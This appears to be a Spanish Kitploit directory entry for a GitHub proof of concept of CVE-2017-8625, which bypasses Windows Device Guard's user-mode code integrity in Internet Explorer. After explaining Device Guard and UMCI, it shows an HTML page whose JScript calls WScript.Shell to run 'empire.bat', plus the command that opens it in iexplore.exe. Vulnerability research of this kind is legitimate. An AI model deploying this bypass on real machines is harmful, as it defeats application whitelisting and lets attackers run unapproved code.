Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2017-8625_Bypass_UMCI — Bypass de la función UMCI en Internet Explorer | Kitploit
Herramientas/GitHubGitHub/homjxi0e/cve-2017-8625_bypass_umci
Escalada de PrivilegiosAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubhomjxi0e/cve-2017-8625_bypass_umci

CVE-2017-8625_Bypass_UMCI

Bypass de la función UMCI en Internet Explorer

Ver Repositorio
11hace 8 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Qué es ! Windows Defender Device Guard !


Windows Defender Device Guard es una combinación de funciones de seguridad de hardware y software relacionadas con la empresa que, cuando se configuran juntas, bloquean un dispositivo para que solo pueda ejecutar aplicaciones confiables que defina en sus políticas de integridad de código. Si la aplicación no es confiable, no puede ejecutarse, punto. Con hardware que cumple los requisitos básicos, esto también significa que incluso si un atacante logra obtener el control del kernel de Windows, será mucho menos probable que pueda ejecutar código malicioso. Con el hardware adecuado, Windows Defender Device Guard puede usar la nueva seguridad basada en virtualización de Windows 10 (disponible en las SKU de escritorio Enterprise y Education y en todas las SKU de Server) para aislar el servicio de integridad de código del propio kernel de Microsoft Windows. En este caso, el servicio de integridad de código se ejecuta junto al kernel en un contenedor protegido por el hipervisor de Windows. Esta guía explora las características individuales de Windows Defender Device Guard, así como cómo planificarlas, configurarlas e implementarlas. Incluye:

Qué es UMCI

UMCI impide que se ejecuten binarios no aprobados, restringe el Windows Scripting Host y coloca a PowerShell en el modo Constrained Language. Esto hace que obtener la ejecución de código en un sistema sea bastante difícil. Esta publicación va a

======================================================================||>

bypass UMCI en Enternet Explorer mediante Jscript !

Vamos a ver una demostración de bypass de código

======================================================================||>

root@kitploit:~
<html>
  <body>
    <script type="text/jscript">
      var r = new ActiveXObject("WScript.Shell").Run("empire.bat");
    </script>
   </body>
</html>

======================================================================||>

root@kitploit:~
PS:>  C:\Users\Homjxie> cmd /C "C:\Program Files\Internet Explorer\iexplore.exe " "C:\Users\Homjxie\Desktop\Homjxie.html"

Modificar código Jscript !

screenshot from 2017-08-25 11-55-12 ======================================================================||>

Siguiente ejecución del bypass

screenshot from 2017-08-25 11-56-01

======================================================================||> ======================================================================||>

Explicación del autor

@Matt Homjxi0e

Autor del bypass

@enigma0x3

Descargar herramienta